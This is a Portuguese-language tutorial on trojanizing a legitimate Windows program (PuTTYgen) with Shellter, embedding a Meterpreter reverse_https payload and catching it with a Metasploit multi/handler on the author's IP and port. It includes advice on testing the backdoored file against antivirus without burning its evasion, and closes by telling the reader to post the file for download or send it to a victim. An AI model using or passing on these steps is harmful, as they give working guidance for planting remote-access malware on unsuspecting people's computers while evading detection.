1- baixe um programa para sua maquina ex: puttygem.exe (eu coloquei em Documentos) você escolhe seu local preferido mas tem que abrir o shellter neste local
vamos lá
2. abrir terminal e fazer procedimento
root@kali:~# service postgresql start
root@kali:~# msfdb init
root@kali:~# msfconsole
3. abrir outro terminal e fazer procedimentos (usaremos 02 terminais)
root@kali:~# cd Documentos
root@kali:~/Documentos# shellter
apos abrir o shellter execute os procedimentos
A
puttygen.exe - obs*(pode ser outros, mas ele tem que estar na pasta eu usei o CypherX)
4. No terminal metasploit fazer procedimentos
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_https
payload => windows/meterpreter/reverse_https
msf exploit(handler) > show options
5. msf exploit(handler) > set exitfun thread
exitfun => thread
msf exploit(handler) > set LHOST (seu IP )
LHOST => 192.168.0.108
msf exploit(handler) >
6.
L
3
seu ip (no meu caso 192.168.0.108)
8843
msf exploit(handler) > show options
msf exploit(handler) > exploit
8. criou na pasta 3 arquivos o que você vai usar é o .exe os demais pode guardar
9. Antes de usar um executável legítimo, tente digitalizá-lo usando um scanner multi-AV online, que não envie amostras para não queimar sua encriptação. Às vezes AVs fazem produzir falsos positivos , por isso é bom saber que seu executável escolhido não foi detectado como algo malicioso em primeiro lugar.
agora é só colocar o arquivo para download ou enviar para sua vitima, para não perder a vitima vai ser em outro tutorial